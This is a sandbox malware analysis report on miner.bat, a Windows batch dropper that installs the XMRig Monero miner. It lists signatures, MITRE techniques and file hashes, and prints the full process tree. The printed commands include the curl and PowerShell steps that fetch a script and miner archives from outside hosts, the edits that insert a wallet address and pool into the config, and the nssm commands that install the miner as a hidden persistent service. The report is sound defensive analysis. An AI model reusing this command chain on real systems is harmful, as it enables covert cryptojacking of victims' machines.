xmrig | c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e

Analysis

max time kernel
1050s
max time network
1039s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
07/06/2024, 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

miner.bat
Size

169B
MD5

abfbeeced32bf0a03b8b0ceeea21e771
SHA1

ccf3673a38497264821bfe9d67a97cc8af444915
SHA256

c2d6f3cf4a462b03e9d0db53f41cee7ab3ec7ee6045492f52851392d874c609e
SHA512

f2fb9f61d5f420271ab531e5b3829a1646a00b8a116a8759a4a88709d227f409e7545166284ad4a4cc0e0eac28473e633caee697d2432b412a63504bb404fa03

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral3/files/0x000100000002a9f9-47.dat	family_xmrig
behavioral3/files/0x000100000002a9f9-47.dat	xmrig
behavioral3/memory/3388-50-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-173-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-174-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-175-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-176-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-177-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-178-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-179-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-180-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-182-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-183-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-184-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-185-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-186-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-187-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-188-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-224-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2216-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	1788	powershell.exe
9	868	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
3388	xmrig.exe
3876	nssm.exe
4972	nssm.exe
2704	nssm.exe
3736	nssm.exe
3128	nssm.exe
436	nssm.exe
4084	nssm.exe
2216	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3876	sc.exe
2868	sc.exe
5068	sc.exe
3796	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
868	powershell.exe
1788	powershell.exe
1816	powershell.exe
4660	powershell.exe
1228	powershell.exe
4088	powershell.exe
3772	powershell.exe
3040	powershell.exe
3216	powershell.exe
1684	powershell.exe
3856	powershell.exe
5016	powershell.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1204	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1788	powershell.exe
1788	powershell.exe
3040	powershell.exe
3040	powershell.exe
1816	powershell.exe
1816	powershell.exe
4660	powershell.exe
4660	powershell.exe
3216	powershell.exe
3216	powershell.exe
1228	powershell.exe
1228	powershell.exe
1684	powershell.exe
1684	powershell.exe
3856	powershell.exe
3856	powershell.exe
4088	powershell.exe
4088	powershell.exe
5016	powershell.exe
5016	powershell.exe
868	powershell.exe
868	powershell.exe
3772	powershell.exe
3772	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeLockMemoryPrivilege	2216	xmrig.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2216	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 1620	2844	cmd.exe	79
PID 2844 wrote to memory of 1620	2844	cmd.exe	79
PID 2844 wrote to memory of 2792	2844	cmd.exe	80
PID 2844 wrote to memory of 2792	2844	cmd.exe	80
PID 2792 wrote to memory of 4188	2792	net.exe	81
PID 2792 wrote to memory of 4188	2792	net.exe	81
PID 2844 wrote to memory of 1284	2844	cmd.exe	82
PID 2844 wrote to memory of 1284	2844	cmd.exe	82
PID 2844 wrote to memory of 1432	2844	cmd.exe	83
PID 2844 wrote to memory of 1432	2844	cmd.exe	83
PID 2844 wrote to memory of 4780	2844	cmd.exe	84
PID 2844 wrote to memory of 4780	2844	cmd.exe	84
PID 2844 wrote to memory of 660	2844	cmd.exe	85
PID 2844 wrote to memory of 660	2844	cmd.exe	85
PID 2844 wrote to memory of 2820	2844	cmd.exe	86
PID 2844 wrote to memory of 2820	2844	cmd.exe	86
PID 2844 wrote to memory of 3796	2844	cmd.exe	87
PID 2844 wrote to memory of 3796	2844	cmd.exe	87
PID 2844 wrote to memory of 3876	2844	cmd.exe	88
PID 2844 wrote to memory of 3876	2844	cmd.exe	88
PID 2844 wrote to memory of 1204	2844	cmd.exe	89
PID 2844 wrote to memory of 1204	2844	cmd.exe	89
PID 2844 wrote to memory of 1788	2844	cmd.exe	91
PID 2844 wrote to memory of 1788	2844	cmd.exe	91
PID 2844 wrote to memory of 3040	2844	cmd.exe	92
PID 2844 wrote to memory of 3040	2844	cmd.exe	92
PID 2844 wrote to memory of 1816	2844	cmd.exe	93
PID 2844 wrote to memory of 1816	2844	cmd.exe	93
PID 2844 wrote to memory of 3388	2844	cmd.exe	94
PID 2844 wrote to memory of 3388	2844	cmd.exe	94
PID 2844 wrote to memory of 1480	2844	cmd.exe	95
PID 2844 wrote to memory of 1480	2844	cmd.exe	95
PID 1480 wrote to memory of 4660	1480	cmd.exe	96
PID 1480 wrote to memory of 4660	1480	cmd.exe	96
PID 4660 wrote to memory of 5104	4660	powershell.exe	97
PID 4660 wrote to memory of 5104	4660	powershell.exe	97
PID 2844 wrote to memory of 3216	2844	cmd.exe	98
PID 2844 wrote to memory of 3216	2844	cmd.exe	98
PID 2844 wrote to memory of 1228	2844	cmd.exe	99
PID 2844 wrote to memory of 1228	2844	cmd.exe	99
PID 2844 wrote to memory of 1684	2844	cmd.exe	100
PID 2844 wrote to memory of 1684	2844	cmd.exe	100
PID 2844 wrote to memory of 3856	2844	cmd.exe	101
PID 2844 wrote to memory of 3856	2844	cmd.exe	101
PID 2844 wrote to memory of 4088	2844	cmd.exe	102
PID 2844 wrote to memory of 4088	2844	cmd.exe	102
PID 2844 wrote to memory of 5016	2844	cmd.exe	103
PID 2844 wrote to memory of 5016	2844	cmd.exe	103
PID 2844 wrote to memory of 868	2844	cmd.exe	104
PID 2844 wrote to memory of 868	2844	cmd.exe	104
PID 2844 wrote to memory of 3772	2844	cmd.exe	105
PID 2844 wrote to memory of 3772	2844	cmd.exe	105
PID 2844 wrote to memory of 2868	2844	cmd.exe	106
PID 2844 wrote to memory of 2868	2844	cmd.exe	106
PID 2844 wrote to memory of 5068	2844	cmd.exe	107
PID 2844 wrote to memory of 5068	2844	cmd.exe	107
PID 2844 wrote to memory of 3876	2844	cmd.exe	108
PID 2844 wrote to memory of 3876	2844	cmd.exe	108
PID 2844 wrote to memory of 4972	2844	cmd.exe	109
PID 2844 wrote to memory of 4972	2844	cmd.exe	109
PID 2844 wrote to memory of 2704	2844	cmd.exe	110
PID 2844 wrote to memory of 2704	2844	cmd.exe	110
PID 2844 wrote to memory of 3736	2844	cmd.exe	111
PID 2844 wrote to memory of 3736	2844	cmd.exe	111

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\miner.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\system32\curl.exe
  curl -o s.bat https://rentry.co/idiotnigger/raw/
  2⤵
  PID:1620
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4188
- C:\Windows\system32\where.exe
  where powershell
  2⤵
  PID:1284
- C:\Windows\system32\where.exe
  where find
  2⤵
  PID:1432
- C:\Windows\system32\where.exe
  where findstr
  2⤵
  PID:4780
- C:\Windows\system32\where.exe
  where tasklist
  2⤵
  PID:660
- C:\Windows\system32\where.exe
  where sc
  2⤵
  PID:2820
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:3796
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:3876
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im xmrig.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe" --help
  2⤵
  - Executes dropped EXE
  PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\system32\HOSTNAME.EXE
      "C:\Windows\system32\HOSTNAME.EXE"
      4⤵
      PID:5104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Inogvswr\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3772
- C:\Windows\system32\sc.exe
  sc stop moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:2868
- C:\Windows\system32\sc.exe
  sc delete moneroocean_miner
  2⤵
  - Launches sc.exe
  PID:5068
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  PID:3876
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
  2⤵
  - Executes dropped EXE
  PID:3736
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
  2⤵
  - Executes dropped EXE
  PID:3128
- C:\Users\Admin\moneroocean\nssm.exe
  "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
  2⤵
  - Executes dropped EXE
  PID:436

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4084
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3146a5e3284e8f3c2fa1c9e316baa977

SHA1
9c794f92d4484e3f762d568defa79d7b3bde3f95

SHA256
6c5288a76cd52e2126cdce244eced220a18efe155055126545945ff28c9436fc

SHA512
02fb556759ee5c3838574c5b7eef0b38d266c9b213c96cf1b35787be8064a232c296cf06af356de3954bbadea37499cc989d03860fd6ba217a2391c15c3d402b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4b9a0ee577466e49a75e4d4e6edaf5c3

SHA1
fea6d7966b30cb24195f016d0430209ae5912c00

SHA256
d9eee1c93b0f9d9ccdd7db6c4e0b834c4ff694d5f5fa3f80c2ca146f65c3040f

SHA512
6d4b66aa952f4c7126607e4af5a029bcf85b6ebde55edec2936cff03f820313992a1cb04cac5b69acef3963103b1d79bc407f74a46bd4fe1fd8b05fd2f2d85a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97d3ce59689b3c92fbeb96f6deeb65ee

SHA1
2b052f7618deaf48674b893a12a6e322d3992b22

SHA256
b43979c17c04af131f9da9bcf3d078039830bc1e41075338a236165b9993051e

SHA512
07c2414101e42565466be1d06fbb826af3f1d316b13caf867f51e5fbe2d07c336b355afd1fa651b5f1ed9c53ae1173ad442a452b826da4a87460a88ba7c8abee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a602b4be3601d2b74dfae2ae754a0af3

SHA1
1a801a31467026b9058333d473f23ba628254832

SHA256
acf843e705d5545a13c9fe5d26bac545a1f8268750a647c7aac54dac578bb8d1

SHA512
5d00a370efa602e680f5a10da10450829173b468e60f0c024fd31f9ce8b6af23bc51f4e866e6c8379d5cacf017c109adcc4b5da85a4c8e78521b22abfb22695a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94437cfe971a7917165123f0a7e57079

SHA1
f6e39687cc0d1005852df75b04e42c17f3b38d53

SHA256
4410e4402451bd75a7453f09331ada135f0d77b5a149b271b491d15cd5c4a1c6

SHA512
77640e3a1102c046fa4b7739f7dff4b81608911e05dbc8030ac55bffe842841f738848256b1261a653328b4eeaaf385e5ec173b2f6adbe731798df24851ae12b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
92c0a0052286aee2674b0ec4284d2c5f

SHA1
d90a01dc3632bbea9425407522907d09e6c28cfb

SHA256
7a8d6ef5d3ba6bb20d990d87bd61e5d9b55c3e95462c8475902eb6ba0aae920e

SHA512
40f89d65e85edc84a4f907d717b94d89a53ba42675ddba219ace84bad230aed84596f079252e0b7017a7f0ff942e86b9f5730f37da2edd99143c030efd85ee76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0b4148568156dcab72e72b181553ef2f

SHA1
c2e5864009a1b32d77618878e9cbdfb539b6e7ad

SHA256
f62e75342a00dac4e8b0c0ed5ad68265bbbd7518de084cfc32e3b5f88cc0cb5e

SHA512
e6a95e0a8b30dd0be87d06ed0f32ed343920e127dff52e842aa2e8f2e24645a51b0fac651a6c1626940af69f8eaee7375716ffbaa0a89742f4e9a3b919b1241e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
caf7c8d742be571cc9df52e5fed42eac

SHA1
6022d6909c68bccce19eeedd6b95b4c74a4eaffb

SHA256
907d59c4a1decc4fcdd1a2614e3884392d7c275f82cc900fe742151b9c9be22c

SHA512
9e8f1a4c2b44b8222f5a31e750ca8fa7f0a4fa6a961c03c0ba8746bc3a8b5cdf08ee91fbc607876b7b2e9ea52562dd55a92d488e4b352f930a4214d5fec8be4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b97ca114f937b56e2996bf97a387d11

SHA1
a5c6ae0b42d1ef92bc42e7514a6426ddccd2931f

SHA256
a0f32d82c068bc84396a0c27784f698244c5f1654396a58b3001e42dce20f452

SHA512
be0cbc65ded013821fdc043d1e42b0e60d0e74b605f9bf16b413c7ed82f2b1a2b5e72796cd244566781a6b705d14f16fc23bafa9f3b9a6852030c39fdd158e76

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kewzrifh.mte.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat

Filesize
14KB

MD5
12a235844829126b56d90f5ff606c555

SHA1
7fed9b9b08a9849dd61f32a6d731e5dd2f94ccc8

SHA256
dfb89d7d439866741417e5aaee451488036f3d4aff806bf6d448fadeefa717ab

SHA512
